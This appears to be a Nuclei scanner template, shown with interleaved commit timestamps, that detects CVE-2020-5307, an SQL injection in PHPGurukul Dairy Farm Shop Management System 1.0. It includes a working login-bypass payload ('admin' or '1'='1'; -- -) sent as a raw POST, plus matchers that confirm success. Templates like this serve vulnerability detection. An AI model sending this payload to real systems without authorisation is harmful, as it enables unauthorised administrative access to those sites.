2021-07-25 02:50:53 +00:00
id : CVE-2020-5307
info :
2022-04-29 19:58:07 +00:00
name : PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection
2021-07-25 02:50:53 +00:00
author : gy741
2022-04-22 10:38:41 +00:00
severity : critical
2022-05-17 09:18:12 +00:00
description : PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://cinzinga.com/CVE-2020-5307-5308/
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-5307
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/47846
- https://cinzinga.github.io/CVE-2020-5307-5308/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-5307
cwe-id : CWE-89
2023-10-14 11:27:55 +00:00
epss-score : 0.02037
2023-10-31 18:27:55 +00:00
epss-percentile : 0.87713
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : phpgurukul_dairy_farm_shop_management_system_project
product : phpgurukul_dairy_farm_shop_management_system
tags : sqli,edb,cve,cve2020
2021-07-25 02:50:53 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-25 02:50:53 +00:00
- raw :
- |
POST /dfsms/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=
matchers-condition : and
matchers :
- type : word
part : header
words :
- "add-category.php"
- type : status
status :
- 302
2023-10-31 10:54:20 +00:00
# digest: 4a0a0047304502206752f63a60bc5d5aa7a57b30429d104d2e2fbf51c10fe8dc375544ed4a2580c2022100d9bef685112aace34593662ee274cb71465cfe18044b591e078e945c39540832:922c64590222798bb761d5b6d8e72950